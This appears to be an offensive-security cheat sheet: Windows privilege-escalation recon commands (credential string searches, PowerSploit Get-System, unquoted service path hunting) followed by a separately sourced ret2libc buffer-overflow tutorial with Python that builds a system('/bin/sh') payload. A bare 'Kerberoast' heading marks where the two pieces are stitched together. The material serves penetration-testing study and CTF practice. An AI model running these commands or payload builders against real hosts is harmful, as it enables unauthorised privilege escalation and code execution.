Recon

# Systeminfo
systeminfo
hostname 

# Especially good with hotfix info
wmic qfe get Caption,Description,HotFixID,InstalledOn

# What users/localgroups are on the machine?
net users
net localgroup
net localgroup Administrators
net user morph3

# Crosscheck local and domain too
net user morph3 /domain
net group Administrators /domain

# Network information
ipconfig /all
route print
arp -a

# What privileges does our token hold? (SeImpersonatePrivilege, SeBackupPrivilege, SeDebugPrivilege etc. are the interesting ones)
whoami /priv

# Recursive string scan
findstr /spin "password" *.*

# Running processes
tasklist /SVC

# Network connections
netstat -ano

# Files without the read-only attribute (an attribute, not an ACL check: confirm real write access with icacls or accesschk)
dir /a-r-d /s /b

### Some good one-liners

# Obtain the path of the executable called by each Windows service (good for checking unquoted paths). Run it from cmd.exe; in a .bat file write %%i instead of %i:
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Elevation of Privileges

     General

# PowerShellMafia / PowerSploit
# Always use the dev branch; the other branches are out of date.
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1
# Add -ep bypass if the execution policy blocks the import
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

# Sherlock
https://github.com/rasta-mouse/Sherlock

# Unquoted service paths: auto-start services outside C:\Windows whose binary path is not already wrapped in quotes
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
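The two one-liners above (the `sc qc` loop under "Some good one-liners" and the wmic filter here) only list candidates; they do not tell you which path an attacker would actually need to write to. The following is an added example, not code from the original cheat sheet: it parses the concatenated `sc qc` output the loop produces and, for every auto-start service outside C:\Windows with an unquoted path, lists the prefixes CreateProcess tries first (C:\Program.exe, C:\Program Files\Vuln.exe, ...). The `SC_QC_OUTPUT` sample and the service names in it are constructed for the example, not taken from a real host.

```python
"""
Added example: find unquoted service paths in `sc qc` output and list the
hijack candidates. Not part of the original cheat sheet.

Windows resolves an unquoted path containing spaces by trying each
space-delimited prefix (with .exe appended) in turn until one exists, so
every prefix before the real executable is a potential hijack location.
"""

# Constructed sample of what the page's `sc qc <name>` loop prints for five
# services. Not output from a real host.
SC_QC_OUTPUT = r"""
SERVICE_NAME: VulnSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Vuln App\svc.exe
SERVICE_NAME: ArgSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Arg App\agent.exe -k netsvcs
SERVICE_NAME: SafeSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Safe App\svc.exe"
SERVICE_NAME: ManualSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files\Manual App\svc.exe
SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
"""


def parse_sc_qc(text):
    """Parse concatenated `sc qc` output into {service_name: {field: value}}."""
    services, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[SC]"):
            continue
        # Split on the first colon only: BINARY_PATH_NAME values contain "C:\".
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "SERVICE_NAME":
            current = services.setdefault(value, {})
        elif current is not None:
            current[key] = value
    return services


def hijack_candidates(binary_path):
    """
    For an unquoted path, return the prefixes CreateProcess tries before it
    reaches the intended executable. A quoted path, or one without spaces,
    yields nothing.
    """
    path = binary_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    words = path.split(" ")
    candidates = []
    for i in range(1, len(words)):
        prefix = " ".join(words[:i])
        if prefix.lower().endswith(".exe"):
            break  # this prefix is the real binary; the remaining words are arguments
        candidates.append(prefix + ".exe")
    return candidates


def unquoted_path_findings(services, skip_prefix="c:\\windows"):
    """Auto-start services outside C:\\Windows whose unquoted path is hijackable."""
    findings = {}
    for name, fields in services.items():
        path = fields.get("BINARY_PATH_NAME", "")
        if "AUTO_START" not in fields.get("START_TYPE", ""):
            continue
        if path.lower().lstrip('"').startswith(skip_prefix):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for svc, paths in unquoted_path_findings(parse_sc_qc(SC_QC_OUTPUT)).items():
        print(f"{svc}: check write access to")
        for p in paths:
            print(f"    {p}")
```

A candidate only matters if the current user can create a file at that location (icacls or accesschk tell you) and the service runs as a more privileged account; ArgSvc shows why the parser stops at the first `.exe` prefix, so trailing service arguments are not mistaken for path components.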

     Kerberoast


Introduction

There is a lot that can be done when analysing a binary, but this post focuses mainly on the ret2libc attack.
Many other tools exist; these are the ones used here.

  • pwntools (python library)
  • A reverse engineering tool (Ghidra, IDA etc.)
  • gdb-peda
  • ldd
  • readelf
  • strings
  • objdump
  • ropper
  • one_gadget

Analysis

First things first:
we need to analyse the binary to determine which attack vector to use.


How Buffer Overflow Works

        Overflowing the buffer overwrites the saved return address on the stack, so when the function returns it jumps to an address of our choosing, which ends in code execution.

Keep in mind that if NX is enabled the stack is not executable, so we can't just jump to shellcode placed in the buffer; we have to return into code that already exists (libc, in this post).

Stack state

|                  |
|                  |
|      BUFFER      |  <- our input is copied in here, growing towards higher addresses
|                  |
|                  |
|                  |  Oops, I overflowed it
|__________________|
|____saved ebp_____|  <---- junk buffer ends here (buffer plus the saved frame pointer)
|_______ret________|  <---- we overwrite the return address with the one we want to call
|                  |
|__________________|

junk_buf + system_addr + exit_addr + binsh_addr
   |           |            |            |
   |           |            |            '--> argument to system(): address of a "/bin/sh" string (in libc or in our buffer)
   |           |            '--> return address for system(): exit(), so the process ends cleanly instead of crashing
   |           '--> overwritten ret: address of system() in libc
   '--> padding up to the saved return address (buffer + saved ebp)

This is the 32-bit x86 layout, where system() reads its argument from the stack just above its return address. On x86-64 the first argument is passed in rdi, so a `pop rdi; ret` gadget has to sit between the padding and the address of system().
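To make the layout concrete, here is an added example (not code from the original post) that builds that exact payload in Python with the standard `struct` module, so it runs without pwntools. The offset, libc base and symbol offsets are hypothetical values chosen for the example; on a real target the offset comes from gdb-peda, the base from a leak (or a non-ASLR binary) and the offsets from `readelf -s libc.so.6` and `strings -a -t x libc.so.6 | grep /bin/sh`.

```python
"""
Added example: build the 32-bit ret2libc payload from the diagram,

    junk (buffer + saved ebp) | system@libc | exit@libc | &"/bin/sh"

and decode it back to check the stack slots it overwrites. Not part of the
original post; every address below is a placeholder.
"""
import struct

# Hypothetical values for a 32-bit target (not from the post): replace with the
# offset you measured in gdb-peda and addresses from the real libc.
OFFSET_TO_RET = 76              # bytes from the start of the buffer to the saved return address
LIBC_BASE = 0xf7d80000          # leaked (or, without ASLR, fixed) libc load address
SYMBOL_OFFSETS = {              # offsets inside libc, e.g. from `readelf -s` and `strings -a -t x`
    "system": 0x00045830,
    "exit": 0x00038f10,
    "/bin/sh": 0x0018c363,
}


def p32(value):
    """Pack a 32-bit little-endian value (pwntools' p32, without needing pwntools)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    """Inverse of p32."""
    return struct.unpack("<I", data)[0]


def resolve(libc_base, offsets):
    """Absolute addresses = libc base + symbol offset; the base leak is what defeats ASLR."""
    return {name: libc_base + off for name, off in offsets.items()}


def build_ret2libc_payload(offset, system_addr, exit_addr, binsh_addr, pad=b"A"):
    """
    junk_buf + system + exit + /bin/sh, as in the diagram. The vulnerable
    function's `ret` pops system's address; system() then sees exit's address
    as its own return address and binsh_addr as its first stack argument.
    """
    return pad * offset + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)


def bad_bytes(payload, forbidden=(b"\x00", b"\n")):
    """Bytes that would cut the copy short for strcpy/gets-style overflows."""
    return [b for b in forbidden if b in payload]


def describe_stack(payload, offset):
    """Decode the three overwritten slots back out of the payload, lowest address first."""
    slots = payload[offset:]
    names = ("ret -> system()", "system()'s return address -> exit()", "system()'s argument -> /bin/sh")
    return [(name, u32(slots[i * 4:(i + 1) * 4])) for i, name in enumerate(names)]


if __name__ == "__main__":
    addrs = resolve(LIBC_BASE, SYMBOL_OFFSETS)
    payload = build_ret2libc_payload(OFFSET_TO_RET, addrs["system"], addrs["exit"], addrs["/bin/sh"])
    for name, value in describe_stack(payload, OFFSET_TO_RET):
        print(f"{name:40} 0x{value:08x}")
    if bad_bytes(payload):
        print("warning: payload contains bytes a string copy would stop at")
    # With pwntools you would now do: p = process("./vuln"); p.sendline(payload); p.interactive()
```

The `bad_bytes` check is the caveat that bites most often: a libc address with a zero byte is fine for a `read()`-based overflow but truncates a `strcpy`/`gets` one, which is when you reach for a different libc function, an alternative "/bin/sh" string, or one_gadget.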